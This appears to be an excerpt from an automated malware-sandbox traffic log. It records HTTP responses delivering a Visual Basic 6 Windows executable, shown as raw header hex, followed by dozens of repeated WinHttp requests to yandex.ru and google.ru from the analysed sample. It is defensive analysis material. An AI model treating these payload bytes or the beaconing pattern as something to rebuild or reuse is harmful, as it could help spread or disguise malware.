          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:50 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Mon, 23 May 2022 22:29:54 GMTConnection: keep-aliveETag: "628c0ae2-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 29 Sep 2022 12:54:52 GMTContent-Type: application/octet-streamContent-Length: 335872Last-Modified: Wed, 18 May 2022 22:16:07 GMTConnection: keep-aliveETag: "62857027-52000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b7 12 07 db f3 73 69 88 f3 73 69 88 f3 73 69 88 1a 6c 64 88 f2 73 69 88 52 69 63 68 f3 73 69 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6c ce e8 42 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 20 03 00 00 10 02 00 00 00 00 00 0c 11 00 00 00 10 00 00 00 30 03 00 00 00 40 00 00 10 00 00 00 10 00 00 04 00 00 00 01 00 03 00 04 00 00 00 00 00 00 00 00 40 05 00 00 10 00 00 b8 7d 05 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 22 03 00 28 00 00 00 00 50 03 00 74 e2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 02 00 00 20 00 00 00 00 10 00 00 6c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 08 14 03 00 00 10 00 00 00 20 03 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 1b 00 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 e2 01 00 00 50 03 00 00 f0 01 00 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 60 1d f3 3e 10 00 00 00 00 00 00 00 00 00 00 00 4d 53 56 42 56 4d 36 30 2e 44 4c 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ruCookie: _yasc=jhOo48wDWFez3aA4ke/HoawdFErttzj/bx63BS9upmbL+J0m; is_gdpr_b=CPe0cBDfjAEYAQ==; is_gdpr=1
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /1001 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: yandex.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
          Source: global trafficHTTP traffic detected: GET /2665d2e9-101f-4a69-9ea9-9e5d49d37eb9 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: google.ru
